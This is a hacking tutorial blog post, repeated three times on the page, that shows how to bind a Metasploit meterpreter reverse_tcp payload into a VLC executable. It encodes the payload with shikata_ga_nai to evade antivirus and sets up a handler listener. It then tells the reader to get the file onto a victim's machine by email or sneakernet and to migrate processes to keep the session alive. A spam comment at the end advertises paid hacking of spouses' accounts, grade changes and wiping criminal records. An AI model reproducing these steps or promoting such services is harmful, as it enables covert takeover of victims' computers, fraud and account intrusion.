Using metasploit, it is possible to combine a meterpreter session with a completely benign executable.
In last article we learnt how to use windows solitaire game to hack a PC, this time we will use another player called VLC media player to hack a pc!
Continuing… when a user executes our executable, a meterpreter session is opened to a remote machine essentially giving it full access to the exploited machine.
Lets take a application and use the reverse-tcp attack.
$ Choose an executable, vlc for example, and download it to the desktop.
$ Setup up the new malicious executable using the reverse_tcp module to allow remote access to the machine by providing an appropriate local IP address and local port for the tcp handler to bind to once executed on the remote machine.
$ We will encode the exe 10 times using shikata to hide from the antivirus long enough for a meterpreter session to be opened.
Open up msfconsole and enter
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.1.3
set LPORT 4444
generate -e x86/shikata_ga_nai -i 10 -x /root/Desktop/vlc.exe -k -t exe -f /root/Desktop/vlc2.exe
$Now we setup a handler session on metsploit that matches the IP and Port parameters specified in the malicious generated executable.
Open msfconsole again and enter
use exploit/multi/handler
set LHOST 192.168.1.3
set LPORT 4444
exploit
$ Find a means of getting the encoded executable onto the victim system either by means of sneakernet or email and have the user open it.
One interesting thing at this time will be that the antivirus will present a dialogue box saying that a malicious file has been detected but by the time that the file is detected, a meterpreter session will have already been opened!!!
As soon as the meterpreter session opens, it is essential to migrate to another process thereby reducing the chance of the session terminating. (providing the Process ID, not the name)
migrate
ps "process ID"
![Defeat antivirus with Shikata encoder (#ISOEH)
-METASPLOIT TUTORIALS DEMYSTIFIED :
(USING VLC MEDIA PLAYER AS HACKING PATHWAY)
[NETWORK PENETRATION ARTICLE ]
for more core-technical articles visit our official site :-https://www.isoeh.com/tutorial.php
Using metasploit, it is possible to combine a meterpreter session with a completely benign executable.
In last article we learnt how to use windows solitaire game to hack a PC, this time we will use another player called VLC media player to hack a pc!
Continuing… when a user executes our executable, a meterpreter session is opened to a remote machine essentially giving it full access to the exploited machine.
Lets take a application and use the reverse-tcp attack.
$ Choose an executable, vlc for example, and download it to the desktop.
$ Setup up the new malicious executable using the reverse_tcp module to allow remote access to the machine by providing an appropriate local IP address and local port for the tcp handler to bind to once executed on the remote machine.
$ We will encode the exe 10 times using shikata to hide from the antivirus long enough for a meterpreter session to be opened.
Open up msfconsole and enter
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.1.3
set LPORT 4444
generate -e x86/shikata_ga_nai -i 10 -x /root/Desktop/vlc.exe -k -t exe -f /root/Desktop/vlc2.exe
$Now we setup a handler session on metsploit that matches the IP and Port parameters specified in the malicious generated executable.
Open msfconsole again and enter
use exploit/multi/handler
set LHOST 192.168.1.3
set LPORT 4444
exploit
$ Find a means of getting the encoded executable onto the victim system either by means of sneakernet or email and have the user open it.
One interesting thing at this time will be that the antivirus will present a dialogue box saying that a malicious file has been detected but by the time that the file is detected, a meterpreter session will have already been opened!!!
As soon as the meterpreter session opens, it is essential to migrate to another process thereby reducing the chance of the session terminating. (providing the Process ID, not the name)
migrate
ps "process ID"
by- Samrat Das www.facebook.com/dkdmd18](https://scontent-b-sin.xx.fbcdn.net/hphotos-ash4/t1.0-9/s480x480/10325354_699282540115577_3372508458320978162_n.png)
In last article we learnt how to use windows solitaire game to hack a PC, this time we will use another player called VLC media player to hack a pc!
Continuing… when a user executes our executable, a meterpreter session is opened to a remote machine essentially giving it full access to the exploited machine.
Lets take a application and use the reverse-tcp attack.
$ Choose an executable, vlc for example, and download it to the desktop.
$ Setup up the new malicious executable using the reverse_tcp module to allow remote access to the machine by providing an appropriate local IP address and local port for the tcp handler to bind to once executed on the remote machine.
$ We will encode the exe 10 times using shikata to hide from the antivirus long enough for a meterpreter session to be opened.
Open up msfconsole and enter
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.1.3
set LPORT 4444
generate -e x86/shikata_ga_nai -i 10 -x /root/Desktop/vlc.exe -k -t exe -f /root/Desktop/vlc2.exe
$Now we setup a handler session on metsploit that matches the IP and Port parameters specified in the malicious generated executable.
Open msfconsole again and enter
use exploit/multi/handler
set LHOST 192.168.1.3
set LPORT 4444
exploit
$ Find a means of getting the encoded executable onto the victim system either by means of sneakernet or email and have the user open it.
One interesting thing at this time will be that the antivirus will present a dialogue box saying that a malicious file has been detected but by the time that the file is detected, a meterpreter session will have already been opened!!!
As soon as the meterpreter session opens, it is essential to migrate to another process thereby reducing the chance of the session terminating. (providing the Process ID, not the name)
migrate
ps "process ID"
Do you need to increase your credit score?
ReplyDeleteDo you intend to upgrade your school grade?
Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
Do you need any information concerning any database.
Do you need to retrieve deleted files?
Do you need to clear your criminal records or DMV?
Do you want to remove any site or link from any blog?
you should contact this hacker, he is reliable and good at the hack jobs..
contact : cybergoldenhacker at gmail dot com